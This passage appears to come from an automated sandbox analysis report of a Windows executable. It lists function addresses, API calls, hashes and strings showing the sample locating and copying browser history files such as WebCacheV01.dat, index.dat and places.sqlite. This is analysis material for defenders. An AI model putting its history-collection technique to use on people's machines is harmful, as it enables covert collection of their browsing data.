                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                • API String ID: 2887208581-2114579845
                                                                                • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043A9F6, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                • API String ID: 2221118986-1725073988
                                                                                • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041443E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: PrivateProfileString$Write
                                                                                • String ID: "%s"
                                                                                • API String ID: 2948465352-3297466227
                                                                                • Opcode ID: f2d4f8f2299b23c90a80b85a1f889718c48d7604a0a66d4ee6f6ddbd3573114a
                                                                                • Instruction ID: dc948e246e24162ff9fb838136c905be2798b3dff786be5c207f2d23625bd25c
                                                                                • Opcode Fuzzy Hash: f2d4f8f2299b23c90a80b85a1f889718c48d7604a0a66d4ee6f6ddbd3573114a
                                                                                • Instruction Fuzzy Hash: 6401AD3240431ABBEF219F81DC09FDB3B6AFF08709F148065BE08501A2D379C9A4EB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004175B7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotificationSleep
                                                                                • String ID: }A
                                                                                • API String ID: 1821831730-2138825249
                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004125B6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??3@DeleteObject
                                                                                • String ID: r!A
                                                                                • API String ID: 1103273653-628097481
                                                                                • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D092, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??2@
                                                                                • String ID:
                                                                                • API String ID: 1033339047-0
                                                                                • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00444B06, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                • memcmp.MSVCRT ref: 00444BA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressProc$memcmp
                                                                                • String ID: $$8
                                                                                • API String ID: 2808797137-435121686
                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00430737, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • too many columns on %s, xrefs: 00430763
                                                                                • duplicate column name: %s, xrefs: 004307FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: duplicate column name: %s$too many columns on %s
                                                                                • API String ID: 0-1445880494
                                                                                • Opcode ID: 7e9b6645e50301b73c799b582cda44e61fb49136c81ea503956771b4ac800c5f
                                                                                • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                • Opcode Fuzzy Hash: 7e9b6645e50301b73c799b582cda44e61fb49136c81ea503956771b4ac800c5f
                                                                                • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E4B2, Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                • CloseHandle.KERNEL32(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                • String ID:
                                                                                • API String ID: 2722907921-0
                                                                                • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E4B2, Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(000000FF,000000FF,00000000,?,?,000000FF), ref: 0040E582
                                                                                • DeleteFileW.KERNEL32(?,?,?,000000FF), ref: 0040E5A3
                                                                                • CloseHandle.KERNEL32(000000FF,?,?,000000FF), ref: 0040E5CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseHandle$DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 2471952376-0
                                                                                • Opcode ID: cf9b911e012f3d7761045ec4ad94b919eee03b73df89c13ff5e32b6c3ba12c89
                                                                                • Instruction ID: a9754f486c66e0f90a8aa0d69ff566490e36326fb13f568159bbee388ef131c8
                                                                                • Opcode Fuzzy Hash: cf9b911e012f3d7761045ec4ad94b919eee03b73df89c13ff5e32b6c3ba12c89
                                                                                • Instruction Fuzzy Hash: 69311AB1C00618ABCF60DBA6CD855CDFBB8AF44318F1002AA9518B31A1EB755ED5CF68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00418758, Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                • String ID:
                                                                                • API String ID: 2947809556-0
                                                                                • Opcode ID: 9c8f7abab99d1da351ac3b6f8ce72ab423c1774e4fe74519c125927a022e4df4
                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                • Opcode Fuzzy Hash: 9c8f7abab99d1da351ac3b6f8ce72ab423c1774e4fe74519c125927a022e4df4
                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403A16, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                • memset.MSVCRT ref: 00403A55
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                • String ID: history.dat$places.sqlite
                                                                                • API String ID: 3093078384-467022611
                                                                                • Opcode ID: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                • Opcode Fuzzy Hash: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B2F5, Relevance: 4.6, APIs: 3, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040B1D1: wcslen.MSVCRT ref: 0040B1DE
                                                                                  • Part of subcall function 0040B1D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                  • Part of subcall function 0040B1D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                  • Part of subcall function 0040B1D1: memcpy.MSVCRT ref: 0040B248
                                                                                • memset.MSVCRT ref: 0040B32F
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0040B432,000000FF,?,00000FFF,00000000,00000000,0040B432,00000000,-00000002,0040B626,00000000), ref: 0040B348
                                                                                  • Part of subcall function 0040B0D1: strlen.MSVCRT ref: 0040B0D8
                                                                                  • Part of subcall function 0040B0D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                  • Part of subcall function 0040B0D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                  • Part of subcall function 0040B0D1: memcpy.MSVCRT ref: 0040B159
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B36F
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy$ByteCharMultiWidememsetstrlenwcslen
                                                                                • String ID:
                                                                                • API String ID: 1562205978-0
                                                                                • Opcode ID: d8387800e9a92ca2c3423d5c58d44b50170b6280e210f698f673ae98213131fe
                                                                                • Instruction ID: b857a4007f161fa5246434627f102fbdc01d58e76d807d6b79cc7eff8a49146b
                                                                                • Opcode Fuzzy Hash: d8387800e9a92ca2c3423d5c58d44b50170b6280e210f698f673ae98213131fe
                                                                                • Instruction Fuzzy Hash: 18212771900218BFDB009B98EC44C9A37ACEB46329F10823BFC45A7292D7B8DD549B5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004175ED, Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                • String ID:
                                                                                • API String ID: 839530781-0
                                                                                • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B3C1, Relevance: 4.5, APIs: 3, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID:
                                                                                • API String ID: 2221118986-0
                                                                                • Opcode ID: 7e1d4fae5655a69f0d9e255d5eea8c4cd8ca5fcd0e36236478752201c4e29ed9
                                                                                • Instruction ID: ab827e58211017b50a374ecff23b92c7d33c5c2594aefa3e9ea54b4f7b6580b8
                                                                                • Opcode Fuzzy Hash: 7e1d4fae5655a69f0d9e255d5eea8c4cd8ca5fcd0e36236478752201c4e29ed9
                                                                                • Instruction Fuzzy Hash: 6A0167B3904308AAFB24D791DD8AB9A73ACDB14714F5100BBA704E21C3EBBC9B45865D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040C1D3, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: *.*$index.dat
                                                                                • API String ID: 1974802433-2863569691
                                                                                • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004099F4, Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??3@mallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 3831604043-0
                                                                                • Opcode ID: 2a092ad8f2336585ed98353820426f0e3c8ffb733fb9aa85e0df6135544c2253
                                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                • Opcode Fuzzy Hash: 2a092ad8f2336585ed98353820426f0e3c8ffb733fb9aa85e0df6135544c2253
                                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00417570, Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00437371, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
